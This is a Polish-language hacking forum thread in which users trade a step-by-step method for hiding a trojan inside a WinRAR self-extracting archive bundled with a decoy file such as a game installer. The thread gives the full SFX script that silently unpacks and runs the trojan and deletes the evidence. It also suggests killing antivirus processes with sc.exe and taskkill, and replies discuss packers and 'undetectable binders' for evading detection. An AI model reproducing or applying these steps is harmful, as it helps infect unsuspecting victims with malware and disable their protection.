Problem z paczka SFX!

[ShadowSSJ2]

Chodz o ten cytat.

Na ten pomysł wpadłem już kilka miesięcy temu, i miałem na celu 'obejście' tylko skanerów online. Ostatnio, zauważyłem że podziałało to nawet na kaspersky av (podobno najlepszy). Połączenie plików polega na zaszyfrowaniu kodu, i spakowaniu go razem z innym plikiem (np. instalką jakiejś gry). Nie musisz znać ŻADNEGO języku programowania! Co potrzeba? Winrara, jakiegoś trojana i innego programu.
Jak się za to wziąć:
1. Generujemy server trojana, i jeśli ma opcje zabijania AV, odznaczamy ją.
2. Bindujemy server winrarem zakładając hasło i zaznaczająć 'szyfruj nazwy plików'.
3. Bindujemy już zaszyfrowany plik, moduł rozpakowujący winrara - textowy unrar.exe, oraz plik z np. grą.
4. Tworzymy SFXa:
Kod:
Path=%systemroot%
Setup=%systemroot%system32cmd.exe /c start /min %systemroot%system32cmd.exe /c "cd /d %systemroot%&unrar.exe e -o- -pHASELKO trojan.rar&start server.exe&del unrar.exe trojan.rar
Silent=1
Overwrite=2
- wiadomo o co chodzi.
5. Zmiana zawartości pliku: np. ikonka.

Sposób sprawdzony, na 100% omija skanery online, 50% kasperskiego.
Można oczywiście do skryptu sfx dołączyć kilka linijek killujących av takie jak: nod32, avast, bitdefender, avg, arcavir, mksvir, kerio personal 4, i wiele innych - da się: sc.exe i taskkill.exe wystarczy (można nawet dołączyć do paczuszki).

Jeżeli AV nie ma heurystyki, oraz nie stosuje iniekcji dll w procesy systemowe - nie ma szans z takim pliczkiem Very Happy[/b]

No wiec rozumiem to tak:

Musze miec 2 pliki wykonywalne, trojan i cos co sie otworzy.

Nie wiem tylko jak z tym commentem SFX.

Path=%systemroot%
Setup=%systemroot%system32cmd.exe /c start /min %systemroot%system32cmd.exe /c "cd /d %systemroot%&unrar.exe e -o- -pHASELKO trojan.rar&start server.exe&del unrar.exe trojan.rar
Silent=1
Overwrite=2

Powiedzcie co oznaczaja te trojan.rar server.exe del unrar.exe.

Zalozmy ze moj trojan nazywa sie serwer.exe, plik 'czysty' ktory sie otworzy to ots.exe, a 'archiwum' bedzie nazywalo sie tak.rar/czy tam exe.

Napiszcie mi jak ma wygladac comment z tymi moimi plikami co napisalem wyzej.

Prosze o odpowiedz.

 

[chudy1993]

Z tego co widzę to wynika że:
trojan.rar - to jest archiwum z trojanem, w którym musi być plik server.exe
server.exe - to jest serwer trojana wypakowany z pliku trojan.rar
unrar.exe - to jest plik odpowiedzialny za wypakowanie trojan.rar
del unrar.exe - ta linijak odpowiada za skasowanie unrar.exe

 

[evolucja]

Może ktoś wytłumaczyć dokładnie o co chodzi?

Jak bindować winrarem? I jak z utworzeniem tego SFXa

 

[0wn3r]

Originally posted by evolucja
Może ktoś wytłumaczyć dokładnie o co chodzi?

Jak bindować winrarem? I jak z utworzeniem tego SFXa

Pakujesz jakieś pliki do archiwum .rar, następnie po pojawieniu się archiwum na Pulpicie otwierasz go i po prawej stronie będziesz miał taki duży guzik z napisem "SFX", klikasz na niego i dalej ustawiasz w Zaawansowanych opcjach licencje, ikonkę instalatora, jaki plik ma być uruchomiony automatycznie po zainstalowaniu itd.

 

[evolucja]

Heh.. może i działa ale wykrywalne jest... Spakowałem te dwa pliki: serwer i install, uruchamia się ale jest wykrywalne. Szkoda, zna ktoś inny sposób by zmniejszyć wykrywalność?

 

[lade]

zmniejszyc? kupic wersje vip lub uzyc niewykrywalnego bindera. ;]

 

[Czak]

Originally posted by lade
zmniejszyc? kupic wersje vip lub uzyc niewykrywalnego bindera. ;]

Taa...albo nauczyć się programować i napisać sobie samemu niewykrywalnego

 

[evolucja]

Hmm, znacie może jakiś poradnik? :]

 

[adam3076]

mozna sprubowac uzyc snpack i zmniejszyc server dziala na 100% ale nie na wszystkie av uzylem go na hamtaro i liczba av kture go widzą zmniejszyła sie o połowe a co do niewykrywalnego blindera to av go nie zobaczy ale jak ofiara uruchomi to z czym go zblindowałeś to av zawyje i nie pomoze ci zaden blinder ani winrar

 

[Kanciastoporty]

blinder[/b]

binder, binder, binder!